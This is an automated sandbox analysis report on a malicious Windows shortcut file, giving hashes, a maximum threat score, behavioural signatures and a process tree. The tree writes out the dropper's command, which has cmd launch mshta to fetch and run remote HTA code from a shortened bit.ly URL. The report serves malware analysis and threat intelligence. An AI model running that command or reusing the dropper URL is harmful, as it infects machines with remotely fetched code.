Analysis

  • max time kernel
    91s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10-04-2024 09:28

General

  • Target

    09bca3ddbc55f22577d2f3a7fda22d1c.lnk

  • Size

    1KB

  • MD5

    09bca3ddbc55f22577d2f3a7fda22d1c

  • SHA1

    bc608400f9fc6c34f7ab230ee71a42920e90c9e7

  • SHA256

    9ab13bfc2c60c1c15e677df76e8768e054d01d24f095cecf752491f785babc0b

  • SHA512

    77ff79364d388489eb7814f3332629e242d0a77878c1b4c79eb26a1bf24a023417bf9b2fc9888c96139903ae50fa34484088776c297605a398631bb9af7f4efc

Score
10/10

Malware Config

Extracted

  • Language
    hta
  • Source
    hta.dropper
  • URLs
    https://bit.ly/2U1JjGq

Signatures

  • Blocklisted process makes network request (3 IoCs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory (4 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\09bca3ddbc55f22577d2f3a7fda22d1c.lnk
    (process tree depth 1)
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1408
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\mshta https://bit.ly/2U1JjGq
      (process tree depth 2)
      • Suspicious use of WriteProcessMemory
      PID:3748
      • C:\Windows\System32\mshta.exe
        C:\Windows\System32\mshta https://bit.ly/2U1JjGq
        (process tree depth 3)
        • Blocklisted process makes network request
        PID:2960

Network

MITRE ATT&CK Enterprise v15
